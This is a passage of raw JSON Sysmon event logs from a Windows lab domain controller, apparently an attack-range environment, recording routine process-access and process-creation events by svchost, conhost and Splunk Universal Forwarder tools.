06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3814,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-00107EA20500}\r\nTargetProcessId: 4836\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-00107EA20500}","TargetProcessId":"4836","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3815,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.255\r\nProcessGuid: {E2A3D6B1-1106-5F25-0000-00103FA30500}\r\nProcessId: 4720\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list replication_port --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-1106-5F25-0000-00107EA20500}\r\nParentProcessId: 4836\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list replication_port --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.255","ProcessGuid":"{E2A3D6B1-1106-5F25-0000-00103FA30500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list replication_port --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-1106-5F25-0000-00107EA20500}","ParentProcessId":"4836","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list replication_port --no-log","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3816,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-1106-5F25-0000-00107EA20500}\r\nSourceProcessId: 4836\r\nSourceThreadId: 4684\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-00103FA30500}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-1106-5F25-0000-00107EA20500}","SourceProcessId":"4836","SourceThreadId":"4684","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-00103FA30500}","TargetProcessId":"4720","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3817,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-00103FA30500}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-00103FA30500}","TargetProcessId":"4720","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3818,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3819,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3820,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3821,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3822,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 